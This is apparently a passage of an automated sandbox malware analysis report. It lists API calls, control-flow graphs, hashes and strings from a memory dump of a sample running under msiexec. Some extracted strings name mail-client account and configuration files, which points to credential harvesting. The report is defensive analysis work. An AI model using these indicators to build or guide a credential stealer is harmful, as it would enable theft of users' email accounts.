                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer
                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                      • API String ID: 3527080286-3064271455
                                                                      • Opcode ID: caa9e8dccf1322b9a2b7129113aa0cbf2469ba0ca58c6af7effb411ff8fa5a88
                                                                      • Instruction ID: 9b3854e9c57707720dd707b20f94d5744897d00890063970088bbd182e9c964d
                                                                      • Opcode Fuzzy Hash: caa9e8dccf1322b9a2b7129113aa0cbf2469ba0ca58c6af7effb411ff8fa5a88
                                                                      • Instruction Fuzzy Hash: EC516F7690050DCBCF04AFF8D9845ACBBB5FF5A210F3442C5E585AF254D7398A29C718

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 238D1D1B
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 238D1D37
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 238D1D4B
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 238D1D58
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 238D1D72
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 238D1D7D
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 238D1D8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                      • String ID:
                                                                      • API String ID: 1454806937-0
                                                                      • Opcode ID: 6486b8f697591ccb9a01b9813e34e492b93f7ae045a8dc939d210bc8ec03ce7a
                                                                      • Instruction ID: 550c1cf010383559e6b064c738fa6f154bad2d3fd5e1903c5f1c77ab12096b90
                                                                      • Opcode Fuzzy Hash: 6486b8f697591ccb9a01b9813e34e492b93f7ae045a8dc939d210bc8ec03ce7a
                                                                      • Instruction Fuzzy Hash: FC214F7294121CEFE710ABF49C8CEEA7ABCEF59244F0405A6F512DA140E7749E468A70

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 361 238d9492-238d94ef GetConsoleCP 362 238d94f5-238d9511 361->362 363 238d9632-238d9644 call 238d2ada 361->363 365 238d952c-238d953d call 238d7c19 362->365 366 238d9513-238d952a 362->366 373 238d953f-238d9542 365->373 374 238d9563-238d9565 365->374 368 238d9566-238d9575 call 238d79e6 366->368 368->363 375 238d957b-238d959b WideCharToMultiByte 368->375 376 238d9609-238d9628 373->376 377 238d9548-238d955a call 238d79e6 373->377 374->368 375->363 379 238d95a1-238d95b7 WriteFile 375->379 376->363 377->363 383 238d9560-238d9561 377->383 381 238d95b9-238d95ca 379->381 382 238d962a-238d9630 GetLastError 379->382 381->363 384 238d95cc-238d95d0 381->384 382->363 383->375 385 238d95fe-238d9601 384->385 386 238d95d2-238d95f0 WriteFile 384->386 385->362 388 238d9607 385->388 386->382 387 238d95f2-238d95f6 386->387 387->363 389 238d95f8-238d95fb 387->389 388->363 389->385
                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,238D9C07,?,00000000,?,00000000,00000000), ref: 238D94D4
                                                                      • __fassign.LIBCMT ref: 238D954F
                                                                      • __fassign.LIBCMT ref: 238D956A
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 238D9590
                                                                      • WriteFile.KERNEL32(?,?,00000000,238D9C07,00000000,?,?,?,?,?,?,?,?,?,238D9C07,?), ref: 238D95AF
                                                                      • WriteFile.KERNEL32(?,?,?,238D9C07,00000000,?,?,?,?,?,?,?,?,?,238D9C07,?), ref: 238D95E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: ee46dae644007c12e54167d03ef6a133f16de3b220b4d3dc5447ffc11dd06b9b
                                                                      • Instruction ID: bac974e70d0ed5646f7affa34ba95c9a18f4b09e049861d84c495bcad89e116b
                                                                      • Opcode Fuzzy Hash: ee46dae644007c12e54167d03ef6a133f16de3b220b4d3dc5447ffc11dd06b9b
                                                                      • Instruction Fuzzy Hash: A051A27290020DEFCB10DFF8D895AEEBBF8EF19310F14419AE955EB285E6709951CB60

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 390 238d3370-238d33b5 call 238d3330 call 238d37a7 395 238d33b7-238d33c9 390->395 396 238d3416-238d3419 390->396 397 238d3439-238d3442 395->397 399 238d33cb 395->399 396->397 398 238d341b-238d3428 call 238d3790 396->398 402 238d342d-238d3436 call 238d3330 398->402 401 238d33d0-238d33e7 399->401 403 238d33fd 401->403 404 238d33e9-238d33f7 call 238d3740 401->404 402->397 407 238d3400-238d3405 403->407 411 238d340d-238d3414 404->411 412 238d33f9 404->412 407->401 410 238d3407-238d3409 407->410 410->397 413 238d340b 410->413 411->402 414 238d33fb 412->414 415 238d3443-238d344c 412->415 413->402 414->407 416 238d344e-238d3455 415->416 417 238d3486-238d3496 call 238d3774 415->417 416->417 419 238d3457-238d3466 call 238dbbe0 416->419 422 238d3498-238d34a7 call 238d3790 417->422 423 238d34aa-238d34c6 call 238d3330 call 238d3758 417->423 427 238d3468-238d3480 419->427 428 238d3483 419->428 422->423 427->428 428->417
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 238D339B
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 238D33A3
                                                                      • _ValidateLocalCookies.LIBCMT ref: 238D3431
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 238D345C
                                                                      • _ValidateLocalCookies.LIBCMT ref: 238D34B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: c9aa00dd02c9d2c982b0af078756f17bb94fa5dca3e8bf96b1097c789042cd9b
                                                                      • Instruction ID: 029f2bcc3fa5abf249d77505c6aa4d9c6c785723cfb4ddbce40c91332b0af87d
                                                                      • Opcode Fuzzy Hash: c9aa00dd02c9d2c982b0af078756f17bb94fa5dca3e8bf96b1097c789042cd9b
                                                                      • Instruction Fuzzy Hash: 2841C436A0020CDBCB11DFB8C880A9EBBB6AF55224F1881E5E9159F351D7B5DA15CB90

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 238D9221: _free.LIBCMT ref: 238D924A
                                                                      • _free.LIBCMT ref: 238D92AB
                                                                        • Part of subcall function 238D571E: HeapFree.KERNEL32(00000000,00000000,?,238D924F,?,00000000,?,00000000,?,238D9276,?,00000007,?,?,238D7E5A,?), ref: 238D5734
                                                                        • Part of subcall function 238D571E: GetLastError.KERNEL32(?,?,238D924F,?,00000000,?,00000000,?,238D9276,?,00000007,?,?,238D7E5A,?,?), ref: 238D5746
                                                                      • _free.LIBCMT ref: 238D92B6
                                                                      • _free.LIBCMT ref: 238D92C1
                                                                      • _free.LIBCMT ref: 238D9315
                                                                      • _free.LIBCMT ref: 238D9320
                                                                      • _free.LIBCMT ref: 238D932B
                                                                      • _free.LIBCMT ref: 238D9336
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                      • Instruction ID: aee71e48654dae79daaa9846fe92c83ce9e4d2ef7d615013edc4e9640e8a9ca4
                                                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                      • Instruction Fuzzy Hash: 79113A72580B0CEADA70ABF4DC46FCB7BEDAF14700F4008A5A6B9AE092DB65A504C651

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 472 238d8821-238d883a 473 238d883c-238d884c call 238d9341 472->473 474 238d8850-238d8855 472->474 473->474 481 238d884e 473->481 476 238d8857-238d885f 474->476 477 238d8862-238d8886 MultiByteToWideChar 474->477 476->477 479 238d888c-238d8898 477->479 480 238d8a19-238d8a2c call 238d2ada 477->480 482 238d88ec 479->482 483 238d889a-238d88ab 479->483 481->474 485 238d88ee-238d88f0 482->485 486 238d88ad-238d88bc call 238dbf20 483->486 487 238d88ca-238d88db call 238d56d0 483->487 489 238d8a0e 485->489 490 238d88f6-238d8909 MultiByteToWideChar 485->490 486->489 500 238d88c2-238d88c8 486->500 487->489 497 238d88e1 487->497 495 238d8a10-238d8a17 call 238d8801 489->495 490->489 494 238d890f-238d892a call 238d5f19 490->494 494->489 504 238d8930-238d8937 494->504 495->480 501 238d88e7-238d88ea 497->501 500->501 501->485 505 238d8939-238d893e 504->505 506 238d8971-238d897d 504->506 505->495 509 238d8944-238d8946 505->509 507 238d897f-238d8990 506->507 508 238d89c9 506->508 510 238d89ab-238d89bc call 238d56d0 507->510 511 238d8992-238d89a1 call 238dbf20 507->511 512 238d89cb-238d89cd 508->512 509->489 513 238d894c-238d8966 call 238d5f19 509->513 517 238d8a07-238d8a0d call 238d8801 510->517 526 238d89be 510->526 511->517 524 238d89a3-238d89a9 511->524 516 238d89cf-238d89e8 call 238d5f19 512->516 512->517 513->495 528 238d896c 513->528 516->517 529 238d89ea-238d89f1 516->529 517->489 530 238d89c4-238d89c7 524->530 526->530 528->489 531 238d8a2d-238d8a33 529->531 532 238d89f3-238d89f4 529->532 530->512 533 238d89f5-238d8a05 WideCharToMultiByte 531->533 532->533 533->517 534 238d8a35-238d8a3c call 238d8801 533->534 534->495
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,238D6FFD,00000000,?,?,?,238D8A72,?,?,00000100), ref: 238D887B
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,238D8A72,?,?,00000100,5EFC4D8B,?,?), ref: 238D8901
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 238D89FB
                                                                      • __freea.LIBCMT ref: 238D8A08
                                                                        • Part of subcall function 238D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 238D5702
                                                                      • __freea.LIBCMT ref: 238D8A11
                                                                      • __freea.LIBCMT ref: 238D8A36
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      • Opcode ID: 9d9b6588c53b32619defd3e881321a1caca83ef6005769d47bac68f55462676c
                                                                      • Instruction ID: f10b7bb0be7ace631ec3656eafc128374195bdd69b82995452dc27101cf54735
                                                                      • Opcode Fuzzy Hash: 9d9b6588c53b32619defd3e881321a1caca83ef6005769d47bac68f55462676c
                                                                      • Instruction Fuzzy Hash: 5B51E17361021EEBDB259EF4CC40EAB37A9EB50A50F2506A9FD04DE144EB34DC50C6A1

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • _strlen.LIBCMT ref: 238D1607
                                                                      • _strcat.LIBCMT ref: 238D161D
                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,238D190E,?,?,00000000,?,00000000), ref: 238D1643
                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,238D190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 238D165A
                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,238D190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 238D1661
                                                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,238D190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 238D1686
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                                      • String ID:
                                                                      • API String ID: 1922816806-0
                                                                      • Opcode ID: 4dfe0732b3c257b498e6e93239d8f63338d124251e43d3d91b3fd34688636ea8
                                                                      • Instruction ID: 01bd981b5c0f411051f98c198e4235343746d7ac4b8a7e8fba5b2a232bef33a5
                                                                      • Opcode Fuzzy Hash: 4dfe0732b3c257b498e6e93239d8f63338d124251e43d3d91b3fd34688636ea8
                                                                      • Instruction Fuzzy Hash: 9321A437A00208EBC7149BB8EC81EFE77B8EF99610F14405AE504AF141EF34AA46C7A5

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 238D1038
                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 238D104B
                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 238D1061
                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 238D1075
                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 238D1090
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 238D10B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                      • String ID:
                                                                      • API String ID: 3594823470-0
                                                                      • Opcode ID: 2bde3d49dab2497899085e04c40a1e42dacd814372f494ab5a9657dae7747150
                                                                      • Instruction ID: a601f1270bb230f0c0a1710136152442cf5c57c84b315a1d6a3220f1785e83eb
                                                                      • Opcode Fuzzy Hash: 2bde3d49dab2497899085e04c40a1e42dacd814372f494ab5a9657dae7747150
                                                                      • Instruction Fuzzy Hash: DC21447690031CDBCF60EBB5EC48DEF376DEF88214F104196E9559B1A1DA309E96CB90
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,238D3518,238D23F1,238D1F17), ref: 238D3864
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 238D3872
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 238D388B
                                                                      • SetLastError.KERNEL32(00000000,?,238D3518,238D23F1,238D1F17), ref: 238D38DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: a09b69aa4e41cf42b9b191619b51453942a82f01c6a409b70f91a87fec1aec7f
                                                                      • Instruction ID: e208a08609d904f8792ea82849634410651d1c78090386b6f039fb5a9913f754
                                                                      • Opcode Fuzzy Hash: a09b69aa4e41cf42b9b191619b51453942a82f01c6a409b70f91a87fec1aec7f
                                                                      • Instruction Fuzzy Hash: FC01B133609B1DEEE21436FA7C849062A98DB756B6B2002EAF111AD0D2EFD5CD01C354
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,238D6C6C), ref: 238D5AFA
                                                                      • _free.LIBCMT ref: 238D5B2D
                                                                      • _free.LIBCMT ref: 238D5B55
                                                                      • SetLastError.KERNEL32(00000000,?,?,238D6C6C), ref: 238D5B62
                                                                      • SetLastError.KERNEL32(00000000,?,?,238D6C6C), ref: 238D5B6E
                                                                      • _abort.LIBCMT ref: 238D5B74
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 3160817290-0
                                                                      • Opcode ID: 31060c534c4e868796ca8d017fcb1c9c1b1960e8131b4c502bb098f376a19deb
                                                                      • Instruction ID: 25270a0c03e77e3b5cdd212f3c9d179677a513b1f54ebc68ff3e929ac1b7d3e0
                                                                      • Opcode Fuzzy Hash: 31060c534c4e868796ca8d017fcb1c9c1b1960e8131b4c502bb098f376a19deb
                                                                      • Instruction Fuzzy Hash: 82F0A437544A0CFAD21232F86C04E0E26EA8FF2571F2801E7F9159E181FF2489068164
                                                                      APIs
                                                                        • Part of subcall function 238D1E89: lstrlenW.KERNEL32(?,?,?,?,?,238D10DF,?,?,?,00000000), ref: 238D1E9A
                                                                        • Part of subcall function 238D1E89: lstrcatW.KERNEL32(?,?,?,238D10DF,?,?,?,00000000), ref: 238D1EAC
                                                                        • Part of subcall function 238D1E89: lstrlenW.KERNEL32(?,?,238D10DF,?,?,?,00000000), ref: 238D1EB3
                                                                        • Part of subcall function 238D1E89: lstrlenW.KERNEL32(?,?,238D10DF,?,?,?,00000000), ref: 238D1EC8
                                                                        • Part of subcall function 238D1E89: lstrcatW.KERNEL32(?,238D10DF,?,238D10DF,?,?,?,00000000), ref: 238D1ED3
                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 238D122A
                                                                        • Part of subcall function 238D173A: _strlen.LIBCMT ref: 238D1855
                                                                        • Part of subcall function 238D173A: _strlen.LIBCMT ref: 238D1869
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                      • API String ID: 4036392271-1520055953
                                                                      • Opcode ID: cf8d99de57a646966a4b438d963fcb58d16dc389386b873b07a5986baba7efb5
                                                                      • Instruction ID: 40bee4472bae6f73cf9fb6ebdc552760002c25b1b10cb60fd6f9c292d30bf69f
                                                                      • Opcode Fuzzy Hash: cf8d99de57a646966a4b438d963fcb58d16dc389386b873b07a5986baba7efb5
                                                                      • Instruction Fuzzy Hash: C521A26AA10308AAEB2497E4EC81AFE7339EF94714F000596F604EF190E6B11D82C759
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,238D4AEA,?,?,238D4A8A,?,238E2238,0000000C,238D4BBD,00000000,00000000), ref: 238D4B59
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 238D4B6C
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,238D4AEA,?,?,238D4A8A,?,238E2238,0000000C,238D4BBD,00000000,00000000,?,238D2082), ref: 238D4B8F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 5fea2f3276e0803ee122ad66d7ce7d4c0c34ae57934d717468c41d681cda71b3
                                                                      • Instruction ID: 55b9780f8e78c90db040d107a7cfc1476b35daebd0d060f934267af912b808a8
                                                                      • Opcode Fuzzy Hash: 5fea2f3276e0803ee122ad66d7ce7d4c0c34ae57934d717468c41d681cda71b3
                                                                      • Instruction Fuzzy Hash: 1EF08C32A0060CEFCB11ABF0C808BADBFB9EF55361F0041A5E906AA240EB348955CA90
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 238D715C
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 238D717F
                                                                        • Part of subcall function 238D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 238D5702
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 238D71A5
                                                                      • _free.LIBCMT ref: 238D71B8
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 238D71C7
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: f9118f4a900ea03f53020e8c067763d200f765e631cfa63ad899a783b8c80408
                                                                      • Instruction ID: 7b529ad67a1d57a1b26394c3582e55f81de65ec3c85d2d67924315bd666b933d
                                                                      • Opcode Fuzzy Hash: f9118f4a900ea03f53020e8c067763d200f765e631cfa63ad899a783b8c80408
                                                                      • Instruction Fuzzy Hash: 7501887360561DFB6B112EFA5C48D7B6B6DDED396071502AABE04CF200EE648C01C5B8
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000000,238D636D,238D5713,00000000,?,238D2249,?,?,238D1D66,00000000,?,?,00000000), ref: 238D5B7F
                                                                      • _free.LIBCMT ref: 238D5BB4
                                                                      • _free.LIBCMT ref: 238D5BDB
                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 238D5BE8
                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 238D5BF1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 6a2dab0715ba663fce83ad560146823377e87a80dc617b5f876ddf059a04c04f
                                                                      • Instruction ID: 8fff66d4ffb3a333e9d4d5ed6d6a829e5234d11c022c909d9909f1c4ff2ec13a
                                                                      • Opcode Fuzzy Hash: 6a2dab0715ba663fce83ad560146823377e87a80dc617b5f876ddf059a04c04f
                                                                      • Instruction Fuzzy Hash: B801D177104B0DFAD31276F82C84D1B2AEE9FE2571B2400EBF8569E142EF69CD068124
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,238D10DF,?,?,?,00000000), ref: 238D1E9A
                                                                      • lstrcatW.KERNEL32(?,?,?,238D10DF,?,?,?,00000000), ref: 238D1EAC
                                                                      • lstrlenW.KERNEL32(?,?,238D10DF,?,?,?,00000000), ref: 238D1EB3
                                                                      • lstrlenW.KERNEL32(?,?,238D10DF,?,?,?,00000000), ref: 238D1EC8
                                                                      • lstrcatW.KERNEL32(?,238D10DF,?,238D10DF,?,?,?,00000000), ref: 238D1ED3
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$lstrcat
                                                                      • String ID:
                                                                      • API String ID: 493641738-0
                                                                      • Opcode ID: 5c904daa41f0ec04701725f5aa0e4d9fe8e02431bbe075c27e4b3004c2396018
                                                                      • Instruction ID: 94bf33fe3aa5b9c7c3fd57c1ffa1a51ee8e3796aa812732c302a81b077e7cdfb
                                                                      • Opcode Fuzzy Hash: 5c904daa41f0ec04701725f5aa0e4d9fe8e02431bbe075c27e4b3004c2396018
